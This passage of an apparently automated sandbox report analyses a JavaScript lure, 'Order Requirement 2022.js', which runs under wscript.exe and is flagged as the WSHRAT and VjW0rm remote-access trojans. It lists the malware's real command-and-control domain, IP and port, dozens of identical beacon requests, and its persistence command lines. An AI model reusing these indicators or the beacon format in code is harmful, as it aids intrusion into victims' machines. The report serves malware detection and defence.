                  Oct 3, 2022 15:57:51.824341059 CEST8.8.8.8192.168.2.50x365eNo error (0)jbd231.duckdns.org109.248.150.138A (IP address)IN (0x0001)false

                  HTTP Request Dependency Graph

                  • jbd231.duckdns.org:2022

                  HTTP Packets

                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  0192.168.2.549726109.248.150.1382022C:\Windows\System32\wscript.exe
                  TimestampkBytes transferredDirectionData
                  Oct 3, 2022 15:57:51.886581898 CEST114OUTPOST /is-ready HTTP/1.1
                  Accept: */*
                  user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/10/2022|JavaScript
                  Accept-Language: en-us
                  UA-CPU: AMD64
                  Accept-Encoding: gzip, deflate
                  Host: jbd231.duckdns.org:2022
                  Content-Length: 0
                  Connection: Keep-Alive
                  Cache-Control: no-cache


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  1192.168.2.549728109.248.150.1382022C:\Windows\System32\wscript.exe
                  TimestampkBytes transferredDirectionData
                  Oct 3, 2022 15:57:57.222153902 CEST115OUTPOST /is-ready HTTP/1.1
                  Accept: */*
                  user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/10/2022|JavaScript
                  Accept-Language: en-us
                  UA-CPU: AMD64
                  Accept-Encoding: gzip, deflate
                  Host: jbd231.duckdns.org:2022
                  Content-Length: 0
                  Connection: Keep-Alive
                  Cache-Control: no-cache


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  10192.168.2.549754109.248.150.1382022C:\Windows\System32\wscript.exe
                  TimestampkBytes transferredDirectionData
                  Oct 3, 2022 15:58:46.360658884 CEST128OUTPOST /is-ready HTTP/1.1
                  Accept: */*
                  user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/10/2022|JavaScript
                  Accept-Language: en-us
                  UA-CPU: AMD64
                  Accept-Encoding: gzip, deflate
                  Host: jbd231.duckdns.org:2022
                  Content-Length: 0
                  Connection: Keep-Alive
                  Cache-Control: no-cache


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  11192.168.2.549758109.248.150.1382022C:\Windows\System32\wscript.exe
                  TimestampkBytes transferredDirectionData
                  Oct 3, 2022 15:58:51.515085936 CEST129OUTPOST /is-ready HTTP/1.1
                  Accept: */*
                  user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/10/2022|JavaScript
                  Accept-Language: en-us
                  UA-CPU: AMD64
                  Accept-Encoding: gzip, deflate
                  Host: jbd231.duckdns.org:2022
                  Content-Length: 0
                  Connection: Keep-Alive
                  Cache-Control: no-cache


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  12192.168.2.549762109.248.150.1382022C:\Windows\System32\wscript.exe
                  TimestampkBytes transferredDirectionData
                  Oct 3, 2022 15:58:56.662533998 CEST131OUTPOST /is-ready HTTP/1.1
                  Accept: */*
                  user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/10/2022|JavaScript
                  Accept-Language: en-us
                  UA-CPU: AMD64
                  Accept-Encoding: gzip, deflate
                  Host: jbd231.duckdns.org:2022
                  Content-Length: 0
                  Connection: Keep-Alive
                  Cache-Control: no-cache


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  13192.168.2.549764109.248.150.1382022C:\Windows\System32\wscript.exe
                  TimestampkBytes transferredDirectionData
                  Oct 3, 2022 15:59:03.007718086 CEST132OUTPOST /is-ready HTTP/1.1
                  Accept: */*
                  user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/10/2022|JavaScript
                  Accept-Language: en-us
                  UA-CPU: AMD64
                  Accept-Encoding: gzip, deflate
                  Host: jbd231.duckdns.org:2022
                  Content-Length: 0
                  Connection: Keep-Alive
                  Cache-Control: no-cache


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  14192.168.2.549767109.248.150.1382022C:\Windows\System32\wscript.exe
                  TimestampkBytes transferredDirectionData
                  Oct 3, 2022 15:59:08.214793921 CEST134OUTPOST /is-ready HTTP/1.1
                  Accept: */*
                  user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/10/2022|JavaScript
                  Accept-Language: en-us
                  UA-CPU: AMD64
                  Accept-Encoding: gzip, deflate
                  Host: jbd231.duckdns.org:2022
                  Content-Length: 0
                  Connection: Keep-Alive
                  Cache-Control: no-cache


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  15192.168.2.549770109.248.150.1382022C:\Windows\System32\wscript.exe
                  TimestampkBytes transferredDirectionData
                  Oct 3, 2022 15:59:13.447659016 CEST135OUTPOST /is-ready HTTP/1.1
                  Accept: */*
                  user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/10/2022|JavaScript
                  Accept-Language: en-us
                  UA-CPU: AMD64
                  Accept-Encoding: gzip, deflate
                  Host: jbd231.duckdns.org:2022
                  Content-Length: 0
                  Connection: Keep-Alive
                  Cache-Control: no-cache


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  16192.168.2.549774109.248.150.1382022C:\Windows\System32\wscript.exe
                  TimestampkBytes transferredDirectionData
                  Oct 3, 2022 15:59:18.917860031 CEST136OUTPOST /is-ready HTTP/1.1
                  Accept: */*
                  user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/10/2022|JavaScript
                  Accept-Language: en-us
                  UA-CPU: AMD64
                  Accept-Encoding: gzip, deflate
                  Host: jbd231.duckdns.org:2022
                  Content-Length: 0
                  Connection: Keep-Alive
                  Cache-Control: no-cache


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  17192.168.2.549777109.248.150.1382022C:\Windows\System32\wscript.exe
                  TimestampkBytes transferredDirectionData
                  Oct 3, 2022 15:59:24.067780018 CEST138OUTPOST /is-ready HTTP/1.1
                  Accept: */*
                  user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/10/2022|JavaScript
                  Accept-Language: en-us
                  UA-CPU: AMD64
                  Accept-Encoding: gzip, deflate
                  Host: jbd231.duckdns.org:2022
                  Content-Length: 0
                  Connection: Keep-Alive
                  Cache-Control: no-cache


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  18192.168.2.549779109.248.150.1382022C:\Windows\System32\wscript.exe
                  TimestampkBytes transferredDirectionData
                  Oct 3, 2022 15:59:29.278633118 CEST139OUTPOST /is-ready HTTP/1.1
                  Accept: */*
                  user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/10/2022|JavaScript
                  Accept-Language: en-us
                  UA-CPU: AMD64
                  Accept-Encoding: gzip, deflate
                  Host: jbd231.duckdns.org:2022
                  Content-Length: 0
                  Connection: Keep-Alive
                  Cache-Control: no-cache


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  19192.168.2.549782109.248.150.1382022C:\Windows\System32\wscript.exe
                  TimestampkBytes transferredDirectionData
                  Oct 3, 2022 15:59:34.417510033 CEST140OUTPOST /is-ready HTTP/1.1
                  Accept: */*
                  user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/10/2022|JavaScript
                  Accept-Language: en-us
                  UA-CPU: AMD64
                  Accept-Encoding: gzip, deflate
                  Host: jbd231.duckdns.org:2022
                  Content-Length: 0
                  Connection: Keep-Alive
                  Cache-Control: no-cache


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  2192.168.2.549732109.248.150.1382022C:\Windows\System32\wscript.exe
                  TimestampkBytes transferredDirectionData
                  Oct 3, 2022 15:58:03.289655924 CEST117OUTPOST /is-ready HTTP/1.1
                  Accept: */*
                  user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/10/2022|JavaScript
                  Accept-Language: en-us
                  UA-CPU: AMD64
                  Accept-Encoding: gzip, deflate
                  Host: jbd231.duckdns.org:2022
                  Content-Length: 0
                  Connection: Keep-Alive
                  Cache-Control: no-cache


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  20192.168.2.549785109.248.150.1382022C:\Windows\System32\wscript.exe
                  TimestampkBytes transferredDirectionData
                  Oct 3, 2022 15:59:40.597927094 CEST141OUTPOST /is-ready HTTP/1.1
                  Accept: */*
                  user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/10/2022|JavaScript
                  Accept-Language: en-us
                  UA-CPU: AMD64
                  Accept-Encoding: gzip, deflate
                  Host: jbd231.duckdns.org:2022
                  Content-Length: 0
                  Connection: Keep-Alive
                  Cache-Control: no-cache


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  21192.168.2.549789109.248.150.1382022C:\Windows\System32\wscript.exe
                  TimestampkBytes transferredDirectionData
                  Oct 3, 2022 15:59:45.746117115 CEST143OUTPOST /is-ready HTTP/1.1
                  Accept: */*
                  user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/10/2022|JavaScript
                  Accept-Language: en-us
                  UA-CPU: AMD64
                  Accept-Encoding: gzip, deflate
                  Host: jbd231.duckdns.org:2022
                  Content-Length: 0
                  Connection: Keep-Alive
                  Cache-Control: no-cache


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  22192.168.2.549792109.248.150.1382022C:\Windows\System32\wscript.exe
                  TimestampkBytes transferredDirectionData
                  Oct 3, 2022 15:59:50.918381929 CEST144OUTPOST /is-ready HTTP/1.1
                  Accept: */*
                  user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/10/2022|JavaScript
                  Accept-Language: en-us
                  UA-CPU: AMD64
                  Accept-Encoding: gzip, deflate
                  Host: jbd231.duckdns.org:2022
                  Content-Length: 0
                  Connection: Keep-Alive
                  Cache-Control: no-cache


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  23192.168.2.549795109.248.150.1382022C:\Windows\System32\wscript.exe
                  TimestampkBytes transferredDirectionData
                  Oct 3, 2022 15:59:56.411391973 CEST146OUTPOST /is-ready HTTP/1.1
                  Accept: */*
                  user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/10/2022|JavaScript
                  Accept-Language: en-us
                  UA-CPU: AMD64
                  Accept-Encoding: gzip, deflate
                  Host: jbd231.duckdns.org:2022
                  Content-Length: 0
                  Connection: Keep-Alive
                  Cache-Control: no-cache


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  24192.168.2.549796109.248.150.1382022C:\Windows\System32\wscript.exe
                  TimestampkBytes transferredDirectionData
                  Oct 3, 2022 16:00:01.475367069 CEST147OUTPOST /is-ready HTTP/1.1
                  Accept: */*
                  user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/10/2022|JavaScript
                  Accept-Language: en-us
                  UA-CPU: AMD64
                  Accept-Encoding: gzip, deflate
                  Host: jbd231.duckdns.org:2022
                  Content-Length: 0
                  Connection: Keep-Alive
                  Cache-Control: no-cache


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  25192.168.2.549800109.248.150.1382022C:\Windows\System32\wscript.exe
                  TimestampkBytes transferredDirectionData
                  Oct 3, 2022 16:00:06.684129000 CEST148OUTPOST /is-ready HTTP/1.1
                  Accept: */*
                  user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/10/2022|JavaScript
                  Accept-Language: en-us
                  UA-CPU: AMD64
                  Accept-Encoding: gzip, deflate
                  Host: jbd231.duckdns.org:2022
                  Content-Length: 0
                  Connection: Keep-Alive
                  Cache-Control: no-cache


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  26192.168.2.549803109.248.150.1382022C:\Windows\System32\wscript.exe
                  TimestampkBytes transferredDirectionData
                  Oct 3, 2022 16:00:11.895919085 CEST149OUTPOST /is-ready HTTP/1.1
                  Accept: */*
                  user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/10/2022|JavaScript
                  Accept-Language: en-us
                  UA-CPU: AMD64
                  Accept-Encoding: gzip, deflate
                  Host: jbd231.duckdns.org:2022
                  Content-Length: 0
                  Connection: Keep-Alive
                  Cache-Control: no-cache


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  27192.168.2.549806109.248.150.1382022C:\Windows\System32\wscript.exe
                  TimestampkBytes transferredDirectionData
                  Oct 3, 2022 16:00:17.051646948 CEST151OUTPOST /is-ready HTTP/1.1
                  Accept: */*
                  user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/10/2022|JavaScript
                  Accept-Language: en-us
                  UA-CPU: AMD64
                  Accept-Encoding: gzip, deflate
                  Host: jbd231.duckdns.org:2022
                  Content-Length: 0
                  Connection: Keep-Alive
                  Cache-Control: no-cache


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  3192.168.2.549733109.248.150.1382022C:\Windows\System32\wscript.exe
                  TimestampkBytes transferredDirectionData
                  Oct 3, 2022 15:58:08.503396034 CEST119OUTPOST /is-ready HTTP/1.1
                  Accept: */*
                  user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/10/2022|JavaScript
                  Accept-Language: en-us
                  UA-CPU: AMD64
                  Accept-Encoding: gzip, deflate
                  Host: jbd231.duckdns.org:2022
                  Content-Length: 0
                  Connection: Keep-Alive
                  Cache-Control: no-cache


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  4192.168.2.549737109.248.150.1382022C:\Windows\System32\wscript.exe
                  TimestampkBytes transferredDirectionData
                  Oct 3, 2022 15:58:13.983128071 CEST120OUTPOST /is-ready HTTP/1.1
                  Accept: */*
                  user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/10/2022|JavaScript
                  Accept-Language: en-us
                  UA-CPU: AMD64
                  Accept-Encoding: gzip, deflate
                  Host: jbd231.duckdns.org:2022
                  Content-Length: 0
                  Connection: Keep-Alive
                  Cache-Control: no-cache


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  5192.168.2.549740109.248.150.1382022C:\Windows\System32\wscript.exe
                  TimestampkBytes transferredDirectionData
                  Oct 3, 2022 15:58:19.149329901 CEST121OUTPOST /is-ready HTTP/1.1
                  Accept: */*
                  user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/10/2022|JavaScript
                  Accept-Language: en-us
                  UA-CPU: AMD64
                  Accept-Encoding: gzip, deflate
                  Host: jbd231.duckdns.org:2022
                  Content-Length: 0
                  Connection: Keep-Alive
                  Cache-Control: no-cache


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  6192.168.2.549743109.248.150.1382022C:\Windows\System32\wscript.exe
                  TimestampkBytes transferredDirectionData
                  Oct 3, 2022 15:58:25.510035038 CEST123OUTPOST /is-ready HTTP/1.1
                  Accept: */*
                  user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/10/2022|JavaScript
                  Accept-Language: en-us
                  UA-CPU: AMD64
                  Accept-Encoding: gzip, deflate
                  Host: jbd231.duckdns.org:2022
                  Content-Length: 0
                  Connection: Keep-Alive
                  Cache-Control: no-cache


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  7192.168.2.549747109.248.150.1382022C:\Windows\System32\wscript.exe
                  TimestampkBytes transferredDirectionData
                  Oct 3, 2022 15:58:30.696047068 CEST124OUTPOST /is-ready HTTP/1.1
                  Accept: */*
                  user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/10/2022|JavaScript
                  Accept-Language: en-us
                  UA-CPU: AMD64
                  Accept-Encoding: gzip, deflate
                  Host: jbd231.duckdns.org:2022
                  Content-Length: 0
                  Connection: Keep-Alive
                  Cache-Control: no-cache


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  8192.168.2.549749109.248.150.1382022C:\Windows\System32\wscript.exe
                  TimestampkBytes transferredDirectionData
                  Oct 3, 2022 15:58:35.892450094 CEST126OUTPOST /is-ready HTTP/1.1
                  Accept: */*
                  user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/10/2022|JavaScript
                  Accept-Language: en-us
                  UA-CPU: AMD64
                  Accept-Encoding: gzip, deflate
                  Host: jbd231.duckdns.org:2022
                  Content-Length: 0
                  Connection: Keep-Alive
                  Cache-Control: no-cache


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  9192.168.2.549752109.248.150.1382022C:\Windows\System32\wscript.exe
                  TimestampkBytes transferredDirectionData
                  Oct 3, 2022 15:58:41.269692898 CEST127OUTPOST /is-ready HTTP/1.1
                  Accept: */*
                  user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/10/2022|JavaScript
                  Accept-Language: en-us
                  UA-CPU: AMD64
                  Accept-Encoding: gzip, deflate
                  Host: jbd231.duckdns.org:2022
                  Content-Length: 0
                  Connection: Keep-Alive
                  Cache-Control: no-cache


                  Statistics

                  CPU Usage

                  Click to jump to process

                  Memory Usage

                  Click to jump to process

                  High Level Behavior Distribution

                  Click to dive into process behavior distribution

                  Behavior

                  Click to jump to process

                  System Behavior

                  General

                  Target ID:0
                  Start time:15:56:13
                  Start date:03/10/2022
                  Path:C:\Windows\System32\wscript.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order Requirement 2022.js"
                  Imagebase:0x7ff6f06f0000
                  File size:163840 bytes
                  MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 00000000.00000003.306663834.0000023FB2AA9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 00000000.00000003.312164849.0000023FB2B5C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 00000000.00000003.307173276.0000023FB2943000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 00000000.00000003.306477021.0000023FB35AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 00000000.00000003.306511935.0000023FB35C5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 00000000.00000003.311353679.0000023FB35E7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 00000000.00000003.307581623.0000023FB294F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 00000000.00000002.324728490.0000023FB34A0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:high

                  General

                  Target ID:1
                  Start time:15:56:21
                  Start date:03/10/2022
                  Path:C:\Windows\System32\wscript.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\CekIalTska.js
                  Imagebase:0x7ff6f06f0000
                  File size:163840 bytes
                  MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_VjW0rm, Description: Yara detected VjW0rm, Source: 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_VjW0rm, Description: Yara detected VjW0rm, Source: 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_VjW0rm, Description: Yara detected VjW0rm, Source: 00000001.00000003.312853725.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_VjW0rm, Description: Yara detected VjW0rm, Source: 00000001.00000003.380177182.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_VjW0rm, Description: Yara detected VjW0rm, Source: 00000001.00000002.851874113.00000228B3130000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:high

                  General

                  Target ID:2
                  Start time:15:56:22
                  Start date:03/10/2022
                  Path:C:\Windows\System32\wscript.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\Order Requirement 2022.js
                  Imagebase:0x7ff6f06f0000
                  File size:163840 bytes
                  MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 00000002.00000003.346293587.0000025291B28000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 00000002.00000003.346110513.0000025291AEA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 00000002.00000003.345846246.0000025291B08000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 00000002.00000002.870934692.00000252913C0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 00000002.00000002.857351439.0000025290FE0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 00000002.00000003.347539680.0000025290E23000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 00000002.00000002.878368097.0000025291B0C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 00000002.00000003.346359959.0000025290FB6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 00000002.00000003.346253406.0000025291AFF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 00000002.00000003.347965187.0000025290E30000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 00000002.00000002.889666132.0000025291B7B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 00000002.00000002.839366000.0000025290DE0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:high

                  General

                  Target ID:3
                  Start time:15:56:31
                  Start date:03/10/2022
                  Path:C:\Windows\System32\wscript.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\wscript.exe" //B "C:\Users\user\AppData\Roaming\Order Requirement 2022.js
                  Imagebase:0x7ff6f06f0000
                  File size:163840 bytes
                  MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 00000003.00000003.359362375.0000020CC9D9D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 00000003.00000003.365466857.0000020CC9121000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 00000003.00000003.362775717.0000020CC9DC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 00000003.00000003.359178897.0000020CC9DA7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 00000003.00000003.360228659.0000020CC9120000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 00000003.00000003.364188132.0000020CC934C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 00000003.00000003.359292280.0000020CC9D8A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 00000003.00000003.360037491.0000020CC9113000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 00000003.00000003.359409394.0000020CC92A4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 00000003.00000002.380509963.0000020CC9C80000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:high

                  General

                  Target ID:4
                  Start time:15:56:40
                  Start date:03/10/2022
                  Path:C:\Windows\System32\wscript.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\CekIalTska.js
                  Imagebase:0x7ff6f06f0000
                  File size:163840 bytes
                  MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_VjW0rm, Description: Yara detected VjW0rm, Source: 00000004.00000002.854554678.0000020016790000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_VjW0rm, Description: Yara detected VjW0rm, Source: 00000004.00000003.418142975.000002001662E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_VjW0rm, Description: Yara detected VjW0rm, Source: 00000004.00000003.355045063.000002001662E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_VjW0rm, Description: Yara detected VjW0rm, Source: 00000004.00000003.417946998.000002001662E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_VjW0rm, Description: Yara detected VjW0rm, Source: 00000004.00000002.851673503.000002001662E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_VjW0rm, Description: Yara detected VjW0rm, Source: 00000004.00000003.355010991.000002001662E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:high

                  General

                  Target ID:5
                  Start time:15:56:40
                  Start date:03/10/2022
                  Path:C:\Windows\System32\wscript.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\wscript.exe" //B "C:\Users\user\AppData\Roaming\Order Requirement 2022.js
                  Imagebase:0x7ff6f06f0000
                  File size:163840 bytes
                  MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Target ID:6
                  Start time:15:56:45
                  Start date:03/10/2022
                  Path:C:\Windows\System32\wscript.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\CekIalTska.js
                  Imagebase:0x7ff6f06f0000
                  File size:163840 bytes
                  MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_VjW0rm, Description: Yara detected VjW0rm, Source: 00000006.00000002.848811043.0000026E2ADF0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_VjW0rm, Description: Yara detected VjW0rm, Source: 00000006.00000003.374542669.0000026E2A5EE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_VjW0rm, Description: Yara detected VjW0rm, Source: 00000006.00000003.438571195.0000026E2A5EE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_VjW0rm, Description: Yara detected VjW0rm, Source: 00000006.00000003.439032554.0000026E2A5EE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_VjW0rm, Description: Yara detected VjW0rm, Source: 00000006.00000003.374490943.0000026E2A5EE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
